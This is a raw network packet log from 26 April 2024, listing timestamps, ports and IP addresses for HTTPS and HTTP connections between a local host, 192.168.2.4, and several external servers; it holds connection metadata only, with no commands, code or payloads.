Apr 26, 2024 18:00:03.078066111 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.078069925 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.078104973 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.078145027 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.078149080 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.078835011 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.078871012 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.078890085 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.078896046 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.078934908 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.078939915 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.079113007 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.079164028 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.079169035 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.079842091 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.079869986 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.079886913 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.079891920 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.079941988 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.079996109 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.080668926 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.080718040 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.080720901 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.080784082 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.080832005 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.080835104 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.081581116 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.081624985 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.081626892 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.081639051 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.081696987 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.082372904 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.082442999 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.184511900 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:03.199811935 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.199888945 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.199913979 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.199959040 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.200731039 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.200783014 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.201006889 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.201052904 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.201057911 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.201102018 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.201124907 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.201172113 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.201767921 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.201818943 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.202522039 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.202567101 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.202615023 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.202662945 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.202666998 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.202730894 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.202774048 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.203419924 CEST	49739	443	192.168.2.4	104.17.24.14
Apr 26, 2024 18:00:03.203435898 CEST	443	49739	104.17.24.14	192.168.2.4
Apr 26, 2024 18:00:03.347007036 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.347031116 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.347089052 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.347491980 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.347501993 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.693774939 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:03.693809986 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:03.694050074 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:03.694431067 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:03.694443941 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:03.734083891 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.737418890 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.737432003 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.738459110 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.738531113 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.742013931 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.742072105 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.742546082 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.742552042 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.885251999 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.981156111 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982115984 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982124090 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982147932 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982153893 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982156038 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982166052 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.982177019 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982207060 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982211113 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.982242107 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.982247114 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982307911 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:03.982351065 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.982587099 CEST	49742	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:03.982599020 CEST	443	49742	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:04.228332996 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:04.228645086 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:04.228667021 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:04.229677916 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:04.229742050 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:06.321228027 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:06.321438074 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:06.323903084 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:06.323956013 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:06.528114080 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:06.528176069 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:06.588161945 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:06.632879019 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:06.850397110 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:06.850486994 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:06.850646019 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:09.920964003 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:09.921001911 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:09.921057940 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:09.922183990 CEST	49743	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:09.922197104 CEST	443	49743	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:09.923269033 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:09.923285961 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:10.453665018 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:10.454562902 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:10.454581022 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:10.454947948 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:10.455679893 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:10.455744028 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:10.455837011 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:10.496123075 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:10.566653013 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:10.566700935 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:10.566874027 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:10.569369078 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:10.569385052 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:10.593666077 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:10.593741894 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:10.593807936 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:10.594626904 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:10.594645023 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:10.830841064 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:10.830919027 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:10.833014965 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:10.833024025 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:10.833292961 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:10.870229959 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:10.916130066 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:10.980232954 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:10.981275082 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:10.981544018 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:10.981560946 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:10.984420061 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:10.984499931 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:10.984797955 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:10.984882116 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:10.985182047 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:10.985189915 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.033185959 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:11.033201933 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.075186014 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.075257063 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.075309992 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.075370073 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.075391054 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.075431108 CEST	49746	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.075436115 CEST	443	49746	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.172872066 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.172909975 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.173008919 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.174369097 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.174382925 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.233567953 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235040903 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235064983 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235107899 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235121965 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.235161066 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235182047 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235203981 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.235204935 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.235224962 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.235619068 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235673904 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.235682011 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.235809088 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.238756895 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.271310091 CEST	49747	443	192.168.2.4	152.199.4.44
Apr 26, 2024 18:00:11.271336079 CEST	443	49747	152.199.4.44	192.168.2.4
Apr 26, 2024 18:00:11.284064054 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:11.284164906 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:11.284241915 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:11.339485884 CEST	49744	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:11.339507103 CEST	443	49744	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:11.429091930 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.429183006 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.494774103 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.494786978 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.495060921 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.496212006 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.540113926 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.679807901 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.679873943 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:11.680067062 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.680932999 CEST	49749	443	192.168.2.4	23.204.76.112
Apr 26, 2024 18:00:11.680948019 CEST	443	49749	23.204.76.112	192.168.2.4
Apr 26, 2024 18:00:12.680195093 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:12.680257082 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:12.680351973 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:12.680646896 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:12.680696964 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:12.680746078 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:12.732558966 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:12.732597113 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:12.732791901 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:12.732832909 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:12.915551901 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:12.915628910 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:12.915684938 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:13.265120029 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.265417099 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.347639084 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.347671032 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.347809076 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.347839117 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.349515915 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.349534035 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.349587917 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.349723101 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.349742889 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.349781036 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.351269007 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.351382017 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.351583004 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.351681948 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.351695061 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.351701975 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.410370111 CEST	49738	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:00:13.410396099 CEST	443	49738	142.250.217.196	192.168.2.4
Apr 26, 2024 18:00:13.433414936 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.433433056 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.480225086 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.558346987 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:13.789180040 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:13.886456966 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:14.090991020 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:14.091072083 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:14.091129065 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:14.091753960 CEST	49753	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:14.091775894 CEST	443	49753	185.216.70.6	192.168.2.4
Apr 26, 2024 18:00:14.141191006 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:14.141225100 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:14.141304016 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:14.142807007 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:14.142819881 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:14.166884899 CEST	49672	443	192.168.2.4	173.222.162.32
Apr 26, 2024 18:00:14.166925907 CEST	443	49672	173.222.162.32	192.168.2.4
Apr 26, 2024 18:00:15.791167974 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:15.791254044 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:15.797348976 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:15.797360897 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:15.797748089 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:15.869050026 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:17.539851904 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:17.580120087 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206662893 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206695080 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206705093 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206726074 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206734896 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206743002 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206743002 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:18.206754923 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206778049 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:18.206820011 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:18.206847906 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206908941 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:18.206918955 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206939936 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.206998110 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:18.737948895 CEST	49723	80	192.168.2.4	23.45.182.85
Apr 26, 2024 18:00:18.864387035 CEST	80	49723	23.45.182.85	192.168.2.4
Apr 26, 2024 18:00:18.864451885 CEST	49723	80	192.168.2.4	23.45.182.85
Apr 26, 2024 18:00:18.984891891 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:18.984891891 CEST	49755	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:18.984919071 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:18.984927893 CEST	443	49755	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:32.337301016 CEST	80	49724	208.111.136.128	192.168.2.4
Apr 26, 2024 18:00:32.337415934 CEST	49724	80	192.168.2.4	208.111.136.128
Apr 26, 2024 18:00:32.337553978 CEST	49724	80	192.168.2.4	208.111.136.128
Apr 26, 2024 18:00:32.465046883 CEST	80	49724	208.111.136.128	192.168.2.4
Apr 26, 2024 18:00:55.580183029 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:55.580221891 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:55.580349922 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:55.580704927 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:55.580718994 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.230406046 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.230488062 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.249901056 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.249924898 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.250348091 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.282325029 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.328115940 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835572958 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835602999 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835638046 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835663080 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835674047 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.835695982 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835721016 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835724115 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.835746050 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.835747004 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835760117 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835769892 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.835786104 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.835830927 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:56.835912943 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.853967905 CEST	49764	443	192.168.2.4	20.114.59.183
Apr 26, 2024 18:00:56.853984118 CEST	443	49764	20.114.59.183	192.168.2.4
Apr 26, 2024 18:00:58.449223995 CEST	49752	443	192.168.2.4	185.216.70.6
Apr 26, 2024 18:00:58.449240923 CEST	443	49752	185.216.70.6	192.168.2.4
Apr 26, 2024 18:01:02.335841894 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:02.335896969 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:02.336256027 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:02.336846113 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:02.336863041 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:02.692917109 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:02.693416119 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:02.693468094 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:02.693842888 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:02.694195986 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:02.694271088 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:02.746515036 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:12.692498922 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:12.692573071 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:12.692789078 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:13.140292883 CEST	49766	443	192.168.2.4	142.250.217.196
Apr 26, 2024 18:01:13.140335083 CEST	443	49766	142.250.217.196	192.168.2.4
Apr 26, 2024 18:01:15.205399036 CEST	49752	443	192.168.2.4	185.216.70.6
